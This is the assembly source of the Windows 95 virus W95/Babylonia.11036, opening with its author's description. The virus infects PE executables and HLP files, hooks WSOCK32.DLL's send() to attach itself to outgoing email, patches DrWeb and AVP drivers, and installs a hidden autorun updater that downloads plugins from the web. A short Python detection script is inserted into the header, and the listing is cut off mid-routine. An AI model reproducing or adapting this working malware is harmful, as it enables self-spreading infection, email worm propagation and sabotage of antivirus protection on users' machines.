[BABYLON.ASM]
comment ^

W95/Babylonia.11036 - Set babylonia on fire!
(c) Vecna 1999

I am of the opinion that asm talks by itself to the worthwhile reader, so I will be brief...

This virus is a memory resident ring0/ring3 virus, infecting PE EXE files, HLP files, and WSOCK32.DLL. The virus uses EPO features, but no encryption or poly at all, although it can be updated via WWW. ;)

For a long time, people were thinking about an upgradeable virus. Some attempts were made, such as W95/SK, which was able to run specially prepared data in RAR files. But how far can the upgrade RAR packet go? In this virus, I show my implementation of a plugin format, with the modules (plug-ins) online at a WWW page.

The virus is also an advanced email worm, attaching itself to all outgoing e-mails (not sending a new one as happy99 does). It can deal with attachments already in the e-mail body, has BASE64 and uu-encode routines, and, more important, the icon of the infected dropper sent by email changes with the current date.

When an infected app (or dropper) is executed, the virus doesn't get control at that moment. The virus patches a JMP or CALL, and waits to be called. When this happens, the virus loads some APIs from the KERNEL32.DLL memory image (using CRC32), then jumps to ring0 using a callgate. The infamous DESCRIPTOR 0 is used to store the temporary data, breaking the pmode taboo ;)

While in ring0, the virus allocates some memory, installs a hook in the IFS handler and waits for access to PE EXE files, HLP files, and WSOCK32.DLL. The memory is also scanned for the presence of SPIDER.VXD (DrWeb) and AVP.VXD (Z0MBiE's lib). If they're found, their code is patched in a way that makes it lose the ability to open files.

After returning control to the host, if the virus has just installed itself memory resident, it drops the www updater to disk and spawns it. More about the www updater below.

PE files, when accessed, are infected by having the virus appended to the last section, or overwriting it if it was relocs, and with the CODE sections scanned for a suitable place for a CALL VIRUS. HLP files have a script added that passes control immediately to the virus code by using the callback features of the USER32 API EnumWindows().

When WSOCK32.DLL is accessed, the send() export is redirected to a chunk of code on top of the relocation info. This code gets a ring0 memory pointer to the new send() handler, through newly added functionality in the GetFileAttributes() API ;) The code in the new send() scans the outgoing data for e-mail info, and adds an infected dropper at the end of it. The virus supports both MIME and non-MIME email clients, and can add the dropper in both uu-encoded and BASE64 format. The icon of this dropper changes together with the name, to reflect some dates.

All data carried with the virus is compressed using the aPLib v0.22b library. I replaced my old LZW scheme with these routines due to the immense gain in speed, compressed size, and code size. It is the same algorithm I used in Fabi.9608.

When the www updater is executed, it registers itself, with the fake name of KERNEL32.EXE, in the registry, to always run, and copies itself to the /winsys directory to avoid easy detection. The updater hides itself from the CTRL+ALT+DEL task list, and stays in the background waiting for the user to connect to the internet.

Always in the background, without any user notice, the www updater then connects to my www page and downloads the virus plug-ins (which have a special format, and can be expanded, to have full compatibility with future versions). If a module complies with the version and features required to run, it is executed.

The power of this is obvious. By adding new plugins, I can make the virus an irc-worm, infect remote drives, or even add a poly engine. The problem of the possible takedown of my URL is bypassed with the smart use of forwarders (not implemented in the public source version of the updater).

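The check_file routine in the listing below marks an infected PE by overwriting the header TimeDateStamp with a value computed from the PE header offset and the entry point, and the infection path stores 0c0000040h as the last section's flags. The following Python is an added detection example, not part of the original source; its function names, verdict strings and sample headers are constructed for illustration.

```python
"""Heuristic scan for the W95/Babylonia header marker (added detection example)."""
import struct
from operator import xor

NOT_PE_SIG = 0xFFFFBAAF            # 32-bit complement of the PE signature 0x00004550
VIRUS_SECTION_FLAGS = 0xC0000040   # value the listing stores in the last section header
RELOCS_STRIPPED = 0x0001           # IMAGE_FILE_RELOCS_STRIPPED
MEM_WRITE = 0x80000000             # IMAGE_SCN_MEM_WRITE


def bswap32(value):
    """Byte-reverse a 32-bit value, like the x86 BSWAP instruction."""
    return int.from_bytes((value & 0xFFFFFFFF).to_bytes(4, "little"), "big")


def expected_marker(pe_offset, entry_rva):
    """TimeDateStamp that check_file writes: bswap(not 'PE' xor pe_ofs) xor entry."""
    return xor(bswap32(xor(NOT_PE_SIG, pe_offset)), entry_rva) & 0xFFFFFFFF


def inspect_pe(data):
    """Return a dict of header traits, or None if data is not an i386 PE32 image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
    if pe_offset + 0xF8 > len(data) or data[pe_offset:pe_offset + 4] != b"PE\0\0":
        return None
    machine, nsections, stamp, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, pe_offset + 4)
    opt = pe_offset + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    # The listing accepts machine types 14ch..14eh and assumes the 0f8h-byte PE32 header.
    if not 0x14C <= machine <= 0x14E or magic != 0x10B or opt_size < 0xE0:
        return None
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    reloc_rva, reloc_size = struct.unpack_from("<II", data, pe_offset + 160)
    table = opt + opt_size
    if nsections == 0 or table + 40 * nsections > len(data):
        return None
    flags = [struct.unpack_from("<I", data, table + 40 * i + 36)[0]
             for i in range(nsections)]
    return {
        "marker": stamp == expected_marker(pe_offset, entry_rva),
        "last_section_flags": flags[-1] == VIRUS_SECTION_FLAGS,
        "first_section_writable": bool(flags[0] & MEM_WRITE),
        "relocs_stripped": (bool(characteristics & RELOCS_STRIPPED)
                            and reloc_rva == 0 and reloc_size == 0),
    }


def verdict(data):
    """Collapse the traits into one label; the marker alone is only a weak signal."""
    traits = inspect_pe(data)
    if traits is None:
        return "not-pe32"
    if traits["marker"] and traits["last_section_flags"]:
        return "likely-infected"
    return "marker-only" if traits["marker"] else "no-marker"


def build_sample(infected, pe_offset=0x80, entry_rva=0x1000):
    """Constructed header-only PE32 image with three sections, used as demo input."""
    stamp = expected_marker(pe_offset, entry_rva) if infected else 0x36D00000
    characteristics = 0x0103 if infected else 0x0102
    section_flags = ((0xE0000020, 0xC0000040, 0xC0000040) if infected
                     else (0x60000020, 0xC0000040, 0x42000040))
    data = bytearray(pe_offset + 0xF8 + 40 * len(section_flags))
    data[:2] = b"MZ"
    struct.pack_into("<I", data, 0x3C, pe_offset)
    data[pe_offset:pe_offset + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", data, pe_offset + 4,
                     0x14C, len(section_flags), stamp, 0, 0, 0xE0, characteristics)
    struct.pack_into("<H", data, pe_offset + 24, 0x10B)
    struct.pack_into("<I", data, pe_offset + 40, entry_rva)
    for index, flags in enumerate(section_flags):
        struct.pack_into("<I", data, pe_offset + 0xF8 + 40 * index + 36, flags)
    return bytes(data)


if __name__ == "__main__":
    for label, sample in (("marked", build_sample(True)), ("clean", build_sample(False))):
        print(label, verdict(sample), inspect_pe(sample))
```

A marker match can occur by chance in a clean file, so the verdict is a triage hint to be confirmed with the section and relocation traits and a full scan.
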
The first module online is the greetz to the people who helped me with this virus, be it with betatesting, with ideas, or with moral support. Currently I am working on new modules, with new ideas that I think will be worth coding.

If you aren't a d0rk, you can contact me at vecna_br@hotmail.com, but idiot questions about how to compile and the like will be ignored... and your soul can be lost in the attempt to contact me ;) Questions about where the entrypoint is will be ignored too... ;>

^
.586p .model flat locals ofs equ offset by equ byte ptr wo equ word ptr dwo equ dword ptr fwo equ fword ptr TRUE EQU 1 FALSE EQU 0 include host.inc _VIRUS segment dword use32 public 'KMARAI' vcode equ this byte DEBUG equ FALSE ;debug version? DROPPER_SIZE equ 6144 ENTRY_READ equ 128 SKIP_FIRST equ 16 CRLF equ <13,10> CRC_POLY equ 0EDB88320h CRC_INIT equ 0FFFFFFFFh crc macro string ;jp/lapse macro .radix 16d crcReg = CRC_INIT irpc _x, ctrlByte = '&_x&' xor (crcReg and 0ff) crcReg = crcReg shr 8 rept 8 ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1)) endm crcReg = crcReg xor ctrlByte endm dd crcReg .radix 10d endm _gdt struc limit dw ? base dd ? _gdt ends _descriptor struc limit_l dw ? base_l dw ? base_m db ? access db ? limit_h db ? base_h db ? _descriptor ends _jmpfar struc jmpofs32 dd ? selectr dw ? _jmpfar ends _callback struc offset_l dw ? selector dw ? attrib dw ? offset_h dw ? _callback ends wsize2 equ 260 hook proc db 0e9h i_jmp dd 0 ;HLP redirector hlp_start = ofs virusmain-$ enter 20h, 0 ;setup stack frame push ecx push ebx mov ebx, [ebp+0Ch] cmp bl, 33 ;hookz ifs_attr je @@jmpcc cmp bl, 36 ;hookz ifs_open je @@jmpcc cmp bl, 37 ;hookz ifs_ren @@jmpcc: jmpcc equ by $ jne @@noopen ;beware! 
near form of jnz mov ebx, ebp pusha call delta mov wo [ebp+(ofs jmpcc-ofs vcode)], 0e990h add esp, -wsize2 mov edi, esp mov eax, [ebx+10h] inc al jz @@nodrive sub ax, -(":@"-1) stosw @@nodrive: push 0 ;BCS_WANSI push 255 mov eax, [ebx+1ch] mov eax, [eax+0ch] inc eax inc eax inc eax inc eax push eax push edi push 400041h ;VxDCall UniToBCSPath call vxd add esp, 16 dec edi ;edi=start of name dec edi lea esi, [edi+eax-2] mov eax, [esi] not eax cmp eax, not '---.' jne @@no_special cmp wo [esi-10], '_\' jne @@no_special ;trying to access the backdoor? cmp dwo [ebx+0ch], 33 ;file attr? jne @@no_special mov wo [ebp+(ofs backdoor-ofs vcode)], 9090h ;wsock32.dll is calling us @@no_special: IF DEBUG EQ TRUE cmp [esi-4], 'TAOG' jne @@shit ENDIF xor eax, not 'EXE.' ;esi=extension jnz @@try_hlp doshdr equ 0 peptr equ 3ch pehdr equ doshdr+40h cbfr equ pehdr+0f8h sectn equ cbfr+100h fsize equ sectn+200h epraw equ fsize+4 vrva equ epraw+4 lolimit equ vrva+4 uplimit equ lolimit+4 wsize4 equ uplimit+4 add esp, -wsize4 ;infect PE EXE files... mov esi, edi call open jc @@err call getsize mov [esp+fsize], eax cmp eax, DROPPER_SIZE ;my babies get better treatment je @@dropper call check_size jz @@err1 @@dropper: mov esi, esp push 40h pop ecx sub edx, edx call read ;read 40h of header xor eax, ecx jnz @@err1 movzx eax, wo [esi] not eax sub eax, not 'ZM' ;make sure is a EXE jnz @@err1 cmp wo [esi+18h], 40h jb @@err1 add cl, 0f8h-40h sub esi, -peptr lodsd xchg eax, edx call read jc @@err1 call check_file ;already infected? jz @@err1 movzx eax, wo [esi+22] test eax, 0102h jz @@err1 test eax, 3000h ;executable/no dll jnz @@err1 movzx ecx, wo [esi+6] cmp cl, 3 jb @@err1 ;too few sections push 0f8h imul ecx, ecx, 40 pop edx add edx, [esp+peptr] lea esi, [esp+sectn] call read ;read section table sub edi, edi xchg edi, ecx mov eax, [esp+pehdr+40] sub eax, [esi+12] cmp eax, [esi+8] ;entrypoint in first section? 
ja @@err1 add eax, [esi+20] ;raw ofs of entrycode mov [esp+epraw], eax mov eax, [esi+36] bts eax, 31 ;make 1st sec +write jc @@err1 ;and exit if already is bt eax, 5 jnc @@err1 ;need be CODE test eax, 10000000h+80h+40h jnz @@err1 ;cant be SHARED or UDATA/DATA mov [esi+36], eax mov eax, [esi+12] mov [esp+lolimit], eax add eax, [esi+8] mov [esp+uplimit], eax ;boundaries of .code section mov ebx, -(ofs vend-ofs vcode) sub ecx, ebx mov eax, [esp+pehdr+160] sub eax, [esi+edi-40+12] jnz @@increase ;last section isnt relocs mov eax, [esi+edi-40+16] add eax, ebx jnb @@increase ;relocs too small sub eax, eax mov edx, eax add eax, [esi+edi-40+12] ;rva of start of our code mov [esp+vrva], eax add edx, [esi+edi-40+20] jmp @@write @@increase: mov eax, [esi+edi-40+8] mov edx, eax add eax, [esi+edi-40+12] add edx, [esi+edi-40+20] mov [esp+vrva], eax ;rva of start of our code sub [esi+edi-40+8], ebx mov eax, [esi+edi-40+16] sub eax, ebx ;increase last section mov ebx, [esp+pehdr+60] dec ebx add eax, ebx not ebx and eax, ebx ;align raw section size mov [esi+edi-40+16], eax @@write: mov dwo [esi+edi-40+36], 0c0000040h sub dwo [esp+vrva], -(ofs virusmain-ofs vcode) add esi, edi add esi, (-40+8) lodsd xchg ebx, eax lodsd add ebx, eax ;rva+size mov eax, [esp+pehdr+56] dec eax add ebx, eax not eax and ebx, eax ;align it mov [esp+pehdr+80], ebx ;update imagesize mov esi, ebp pusha mov edx, [esp+epraw+((8*4))] push ENTRY_READ lea esi, [esp+cbfr+(8*4)+4] pop ecx call read ;read entrycode pusha push SKIP_FIRST pop eax add esi, eax ;skip first bytes(antiAV) sub ecx, eax @@jmp_call: lodsb cmp al, 0e8h ;call je @@found cmp al, 0e9h ;jmp je @@found @@loop1: loop @@jmp_call mov edi, [esp+(1*4)] ;put CALL at start push 5 pop esi jmp @@calculate @@found: mov edi, esi lodsd ;displacement mov edx, esi sub esi, [esp+(1*4)] ;turn to distance add eax, esi add eax, [esp+pehdr+40+(16*4)] ;add entrypoint(our base) cmp eax, [esp+lolimit+(16*4)] jb @@out cmp eax, [esp+uplimit+(16*4)] ;valid call? 
jb @@fine @@out: sub ecx, 4 mov esi, edx jmp @@loop1 @@fine: dec edi @@calculate: push esi mov esi, edi lodsb not eax mov by [ebp+(ofs instr1-ofs vcode)], al ;save modificated code lodsd not eax mov [ebp+(ofs instr2-ofs vcode)], eax pop ecx add ecx, [esp+pehdr+40+(16*4)] ;add entrypoint mov al, 0e8h stosb mov eax, [esp+vrva+(16*4)] ;our rva sub eax, ecx stosd ;build call to it popa call write ;write entrycode popa call write ;write virus body sub edx, edx push 0f8h lea esi, [esp+peptr+4] lodsd pop ecx xchg edx, eax bts wo [esi+22], 0 mov [esi+160], eax ;strip relocs mov [esi+164], eax call write ;write old header add edx, eax movzx ecx, wo [esi+6] imul ecx, ecx, 40 sub esi, -(sectn-pehdr) call write ;write section table @@err1: call close @@err: add esp, wsize4 @@try_hlp: xor eax, not 'PLH.' xor not 'EXE.' jnz @@wsockdll buffer equ 0 ;stack frame old_ofs equ 4 old_sz equ 8 patch1 equ 12 wsize3 equ 16 mainhdr equ 0 ;buffer structure pagedir equ 10h syshdr equ 210h build equ 225h add esp, -wsize3 ;infect HLP files... mov esi, edi call open jc @@error000 push 32*1024 push 040000dh ;getheap call vxd pop ecx mov [esp+buffer], eax mov esi, eax ;esi=buffer.mainhdr push 10h pop ecx sub edx, edx call read ;read 10h of header jc @@free lodsd xor eax, 035f3fh ;hlp signature? 
jnz @@free lodsd lea edx, [eax+37h] ;edx=directory offset mov ecx, 200h lodsd lodsd ;esi=buffer.pagedir call read mov ecx, eax @@search: dec ecx jz @@free cmp dwo [esi+ecx], 'SYS|' jnz @@search cmp dwo [esi+ecx+4], 'MET' jnz @@search mov eax, [esi-4] ;eax=end of file xchg eax, [esi+ecx+8] ;section code = end of file xchg eax, edx push 15h push 15h sub esi, -(syshdr-pagedir) pop ecx call read ;read sys hdr mov ecx, [esi] pop eax sub ecx, eax add edx, eax mov [esp+old_ofs], edx mov [esp+old_sz], ecx ;save old code position/size mov edi, [esp.buffer] sub edi, -build lea esi, [ebp+(ofs hlp1_s-ofs vcode)] lea eax, [edi+(ofs _size-ofs hlp1_s)] mov [esp.patch1], eax push hlp1_sz pop ecx @@decr: lodsb ;copy start macro not al stosb loop @@decr push edi ;edi=buffer mov dwo [ebp+(ofs i_jmp-ofs vcode)], hlp_start lea esi, [ebp+(ofs vend-ofs vcode)] @@next: add esi, -4 mov eax, [esi] call check test edx, edx ;can make it directly? jnz @@ext mov al, 12h ;push ? org $-1 push 12345678h org $-4 stosb mov eax, [esi] stosd jmp @@done_ @@ext: mov al, 0b8h ;mov eax, ? stosb mov eax, [esi] xor eax, edx stosd mov al, 35h ;xor eax, ? stosb mov eax, edx stosd mov al, 50h ;push eax stosb @@done_: cmp esi, ebp jne @@next pop eax mov ecx, edi sub ecx, eax ;ecx=poly code sub eax, eax mov dwo [esi+(ofs i_jmp-ofs vcode)], eax push ecx add ecx, (ofs hlp1_e-ofs p1)+(ofs hlp2_e-ofs hlp1_e) mov eax, [esp.patch1+4] mov wo [eax], cx ;patch macro size sub esi, -(ofs hlp1_e-ofs vcode) push hlp2_sz pop ecx rep movsb ;copy end macro pop eax mov esi, [esp.buffer] sub esi, -syshdr add eax, hlp2_e-hlp1_s add [esi], eax add [esi+4], eax ;fix syshdr size mov esi, edi mov edx, [esp.old_ofs] mov ecx, [esp.old_sz] sub eax, ecx ;old script too large? 
jbe @@free call read ;read old code cmp [esi+4], "`(RR" je @@free ;probably already infected mov ebp, [esp.buffer] ;ebp=buffer lea ecx, [edi+eax] sub ecx, ebp ;ecx=our size add ecx, -syshdr mov edx, [ebp.mainhdr+12] lea esi, [ebp.syshdr] call write ;write our code mov esi, [esp.buffer] push 10h add [esi.mainhdr+12], eax sub edx, edx pop ecx call write ;write main header mov edx, [esi.mainhdr+4] sub edx, -37h mov ecx, 200h add esi, pagedir call write ;write directory @@free: push dwo [esp+buffer] push 040000eh ;freeheap call vxd pop eax call close ;close file @@error000: add esp, wsize3 @@wsockdll: ; xor eax, not 'EXE.' xor not 'PLH.' xor not 'LLD.' xor eax, 01c000c00h jnz @@shit IF DEBUG EQ FALSE mov eax, [esi-4] mov esi, [esi-8] not eax xchg eax, esi not eax cmp esi, not '23KC' jne @@shit cmp eax, not 'OSW\' jne @@shit ENDIF obufer equ 0 ;stack frame header equ obufer+3ch pe_hdr equ header+4 section equ pe_hdr+0f8h export equ section+200h vofs equ export+4 vraw equ vofs+4 etable equ vraw+4 wsize1 equ etable+(4*20) add esp, -wsize1 ;patch WSOCK32.DLL... mov esi, edi call open jc @@error0 call getsize mov edi, eax call check_size jz @@error1 sub edx, edx mov ecx, 40h lea esi, [esp+obufer] call read cmp wo [esp+obufer], 'ZM' jne @@error1 push 0f8h pop ecx mov edx, [esp+header] cmp edx, edi jae @@error1 ;point outside of the file? 
lea esi, [esp+pe_hdr] call read jc @@error1 call check_file jz @@error1 call write ;write pe header add edx, eax movzx ecx, wo [esi+6] push ecx imul ecx, ecx, 40 lea esi, [esp+section+4] call read ;read section table pop ecx @@writeable: bts dwo [esi+36], 31 ;make all sections writeable sub esi, -40 loop @@writeable mov [esi-40+36], 0c0000040h mov ecx, [esi-40+8] ;increase last section push ecx add ecx, [esi-40+20] mov [esp+vraw+4], ecx ;raw of our patch pop ecx add ecx, [esi-40+12] mov [esp+vofs], ecx ;rva of our patch add dwo [esi-40+8], (ofs pend-ofs pstart) mov ebx, [esi-40+8] cmp ebx, [esi-40+16] jbe @@fit mov ecx, [esp+pe_hdr+60] dec ecx add ebx, ecx not ecx and ebx, ecx mov [esi-40+16], ebx ;align @@fit: xchg eax, ecx lea esi, [esp+section] call write mov eax, [esp+pe_hdr+120] ;eax=export table call rva2raw xchg eax, edx push 4 pop ecx sub edx, -28 lea esi, [esp+export] call read ;read export table addresses mov eax, [esi] call rva2raw xchg eax, edx push (4*20) pop ecx lea esi, [esp+etable] ;read 20 exports call read mov eax, [esp+vofs] mov edi, [esp+pe_hdr+52] ;wsock32 base sub eax, -(ofs send-ofs pstart) xchg [esi+(4*18)], eax ;hook send add edi, eax mov [ebp+(ofs oldsend-ofs vcode)], edi mov [ebp+(ofs _send-ofs vcode)], edi call write mov edx, [esp+vraw] push (ofs pend-ofs pstart) pop ecx call delta sub ebp, -(ofs pstart-ofs vcode) xchg esi, ebp call write ;write our patch @@error1: call close @@error0: add esp, wsize1 @@shit: add esp, wsize2 ;release tmp buffer mov wo [ebp+(ofs jmpcc-ofs vcode)], 0850fh popa @@noopen: push 6 push 1Ch pop ebx pop ecx ;total=6 paramz @@nparam: mov eax, [ebp+ebx] ;copy paramz from old frame push eax ;to new frame add ebx, -4 loop @@nparam db 0b8h ;mov eax, ? 
oldhook dd 0 call [eax] ;call old hookz add esp, 6*4 backdoor equ $ jmp @@closed call @@delta @@delta: pop ecx add ecx, (ofs my_send-ofs @@delta) mov wo [ecx-(ofs my_send-ofs backdoor)], ((ofs @@closed-(ofs backdoor+2))*100h)+0ebh mov ebx, [ebp+1ch] ;ioreq push esi mov esi, [ebx+14h] lodsd ;c:\_ sub eax, eax mov ebx, eax @@byte: lodsb ;get filename char inc ah sub al, 'A' or bl, al ;build address cmp ah, 8 je @@doneb shl ebx, 4 jmp @@byte @@doneb: mov [ebx], ecx ;patch requested address pop esi @@closed: pop ebx pop ecx leave ret hook endp delta proc call @@delta @@delta: pop ebp add ebp, -(ofs @@delta-ofs vcode) ret delta endp check_file proc mov eax, [esi] not eax cmp eax, not 'EP' jne @@error cmp wo [esi+4], 14ch ;386 jb @@error cmp wo [esi+4], 14eh ;586 ja @@error xor eax, edx ;(not('PE')xor(pe_ofs)xor(entry)) bswap eax xor eax, [esi+40] cmp [esi+8], eax ;infected? mov [esi+8], eax db 066h, 0b8h ;mov ax, ? @@error: sub eax, eax ret check_file endp gdt equ 0 idt equ 6 ring0_cs equ 12 ring0_ds equ 16 jmpfar equ 20 wsize equ 26 kernel32 equ 0bff70000h virusmain proc pushf pusha add esp, -wsize cld sub eax, eax call @@seh mov esp, [esp+8] ;hmm... SEH... :/ jmp @@installed @@seh: push dwo fs:[eax] mov fs:[eax], esp mov esi, [kernel32+80h+120] ;get kernel32 APIs... 
mov esi, [esi] sub esi, -(kernel32+24) ;esi=export directory+24 lodsd push eax lodsd push eax lodsd xchg ebx, eax pop ebp ;ebp=RVA table pop ecx ;ecx=number of names lodsd xchg esi, eax ;esi=names table xchg esi, ebx ;ebx=ordinal table mov edx, -kernel32 sub esi, edx sub ebp, edx sub ebx, edx ;edx=-kernel32 sub edi, edi @@loopy: inc edi ;edi=ordinal counter lodsd ;eax=API name string pusha sub eax, edx xchg eax, esi push CRC_INIT ;calculate crc of string pop ecx @@next_byte: lodsb test al, al jz @@done xor cl, al mov al, 8 @@next_bit: shr ecx, 1 jnc @@poly xor ecx, CRC_POLY @@poly: dec al jnz @@next_bit jmp @@next_byte @@done: call @@delta1 @@delta1: pop esi add esi, (ofs _openfile-ofs @@delta1) cmp ecx, 12345678h ;crcz of API org $-4 crc je @@patch_api sub esi, -((ofs _getfattr-ofs vcode)-(ofs _openfile-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _writefile-ofs vcode)-(ofs _getfattr-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, ((ofs _closehandle-ofs vcode)-(ofs _writefile-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _seekfile-ofs vcode)-(ofs _closehandle-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _loadl-ofs vcode)-(ofs _seekfile-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _freel-ofs vcode)-(ofs _loadl-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _getproc-ofs vcode)-(ofs _freel-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _gsystime-ofs vcode)-(ofs _getproc-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _fdelete-ofs vcode)-(ofs _gsystime-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _readfile-ofs vcode)-(ofs _fdelete-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _getmhandle-ofs vcode)-(ofs _readfile-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _winexec-ofs vcode)-(ofs 
_getmhandle-ofs vcode)) cmp ecx, 12345678h org $-4 crc jne @@end_loopy @@patch_api: movzx eax, wo [ebx+(edi*2)] ;get ordinal dec eax mov eax, [ebp+(eax*4)] ;get rva sub eax, edx mov [esi], eax ;got it! @@end_loopy: popa dec ecx jnz @@loopy ;all APIs scanned call delta lea eax, [ebp+(ofs wsock-ofs vcode)] push eax db 0b8h _loadl dd 0 call eax ;load wsock32.dll xchg eax, ecx jecxz @@suxx push ecx ;for FreeLibrary call @@send db 'send', 0 @@send: push ecx db 0b8h+7 ;GetProcAddress _getproc dd 0 call edi cmp by [eax], 0e8h ;the difference between masters jne @@isnt ;and pupils ;) cmp by [eax+5], 0b8h jne @@isnt mov eax, [eax+6] ;get real addy :) @@isnt: mov [ebp+(ofs oldsend-ofs vcode)], eax db 0b8h _freel dd 0 call eax @@suxx: push 8 push ebp pop esi push (ofs vend-ofs vcode)/4 ;make sure we're commited pop ecx rep lodsd pop eax lea edi, [ebp+(ofs myname-ofs vcode)] xchg eax, ecx rep stosd mov ebp, esp ;jmp2ring0... push 1 sgdt [ebp+gdt] ;get global descriptor table sidt [ebp+idt] ;get interrupt table mov esi, [ebp+gdt.base] mov edi, esi movzx ecx, wo [ebp+gdt.limit] pop ebx @@search_gdt: sub eax, eax cmp wo [esi.limit_l], 0ffffh jne @@next_descriptor cmp by [esi.limit_h], 0cfh ;descriptor start at 0? jne @@next_descriptor cmp wo [esi.base_l], ax ;and cover the whole range? jne @@next_descriptor cmp by [esi.base_m], al jne @@next_descriptor cmp by [esi.base_h], al jne @@next_descriptor ;is a flat descriptor! cmp [esi.access], 9bh jne @@no_code ;is a code descriptor? mov eax, esi sub eax, [ebp+gdt.base] mov [ebp+ring0_cs], eax ;yes, save it! shl ebx, 1 jmp @@next_descriptor @@no_code: cmp [esi.access], 93h jne @@next_descriptor ;is a data descriptor? mov eax, esi sub eax, [ebp+gdt.base] mov [ebp+ring0_ds], eax ;yes, save it! shl ebx, 1 @@next_descriptor: lodsd lodsd bt ebx, 2 ;our 2 descriptors found? 
jc @@search_done loop @@search_gdt jmp @@installed ;flat descriptors dont found @@search_done: mov esi, edi ;esi=1st entry lodsd ;edi=nul entry lodsd test eax, eax ;nul entry isnt empty? jnz @@installed ;then already resident pusha movsd movsd ;backup 1st descriptor popa mov eax, dwo [ebp+ring0_cs] mov wo [esi.selector], ax ;ring0 code selector mov wo [esi.attrib], 0ec00h call @@over_ring0_code ;[esp]=ring0 code @@ring0_code: mov ds, ax mov es, ax ;setup data access xchg esi, edi movsd ;restore 1st descriptor movsd mov edi, ebp mov ebx, [edi.gdt.base] movzx ecx, wo [edi.gdt.limit] call protect ;make gdt read only mov ebx, [edi.idt.base] movzx ecx, wo [edi.idt.limit] call protect ;make idt read only push 00270005h call vxd ;VXDLDR GetDeviceList @@next: mov ebx, [eax+5] ;VxD_Desc_Block *DI_DDB sub ebx, 0C0000000h jc @@next_vxd lea ecx, [ebx+0C000000Ch] ;Name_0 cmp [ecx], 'DIPS' ;'SPIDER ' je @@patch cmp [ecx], '9PVA' ;'AVP95 ' jne @@next_vxd @@patch: push 0000D500h ;R0_OPENCREATFILE pop esi call ScanVxd inc esi ;R0_OPENCREAT_IN_CONTEXT call ScanVxd @@next_vxd: mov eax, [eax] or eax, eax jnz @@next push 9 push eax push eax push eax push eax push eax push 1 push 64/4 ;memory for email shitz push 010053h call vxd add esp, 8*4 test eax, eax jz @@fucked mov [ebp+(ofs mem_temp-ofs vcode)], eax @@fucked: push (ofs vend-ofs vcode) push 9 push eax push eax push eax push eax push eax push 1 push (((ofs vend-ofs vcode)+4095)/4096) push 010053h ;PageAlloc call vxd add esp, 8*4 test eax, eax jz @@fuck mov edi, eax xchg eax, ecx xchg ecx, [esp] ;pop size/push &hook push ebp pop esi rep movsb mov [edi+(ofs i_jmp-ofs vcode)-(ofs vend-ofs vcode)], ecx mov [edi+(ofs socket_out-ofs vcode)-(ofs vend-ofs vcode)], ecx mov wo [edi+(ofs jmpcc-ofs vcode)-(ofs vend-ofs vcode)], 0850fh push 00400067h ;install ifs hook call vxd mov [edi+(ofs oldhook-ofs vcode)-(ofs vend-ofs vcode)], eax @@fuck: pop eax retf @@over_ring0_code: pop eax mov ebx, eax shr eax, 16 mov wo [esi.offset_l], bx ;address 
of routine mov wo [esi.offset_h], ax push 0 pop dwo [ebp+jmpfar.jmpofs32] mov wo [ebp+jmpfar.selectr], 8 ;jmp to callback 1 mov eax, dwo [ebp+ring0_ds] ;set ring0 data push ds push es cli call fwo [ebp+jmpfar] ;call our ring0 code cli pop es pop ds @@installed: sub eax, eax pop dwo fs:[eax] ;remove SEH pop ecx call delta mov eax, [ebp+(ofs mem_temp-ofs vcode)] test eax, eax jz @@no_ready push eax call @@over include updater.inc @@over: call _aP_depack_asm ;unpack updater data push eax push 2 pop ecx lea esi, [ebp+(ofs dropname-ofs vcode)] call r3_open pop ecx jz @@no_ready mov esi, [ebp+(ofs mem_temp-ofs vcode)] call r3_write call r3_close push 0 lea eax, [ebp+(ofs dropname-ofs vcode)] push eax db 0b8h _winexec dd 0 call eax @@no_ready: cmp dwo [ebp+(ofs i_jmp-ofs vcode)], 0 je @@pe_exe add esp, wsize popa popf add esp, (ofs vend-ofs vcode) sub eax, eax ;stop enumeration ret 8 ;return to callback @@pe_exe: lea eax, [esp+wsize+(9*4)] mov edi, [eax] sub edi, 5 ;return place mov [eax], edi mov al, not 0b8h instr1 equ by $-1 not eax stosb mov eax, 12345678h instr2 equ dwo $-4 not eax stosd add esp, wsize popa popf ret ;return to same place! virusmain endp hlp1_s = $ dw 4 dw (ofs _label1-ofs _label2) _label2 = $ db "RR(`USER32.DLL',`EnumWindows',`SU')", 0 _label1 = $ dw 4 _size dw 0 p1 = $ db "EnumWindows(`" hlp1_e = $ hlp1_sz = hlp1_e-hlp1_s jmp esp db "',666)", 0 ;29A hlp2_e = $ hlp2_sz = hlp2_e-hlp1_e check proc call checkv jc @@again_1 sub edx, edx ret @@again_1: mov ebx, eax @@again: mov eax, ebx call rnd xor eax, edx call checkv ;eax was validated? jc @@again xchg eax, edx ;edx is valid modifier? 
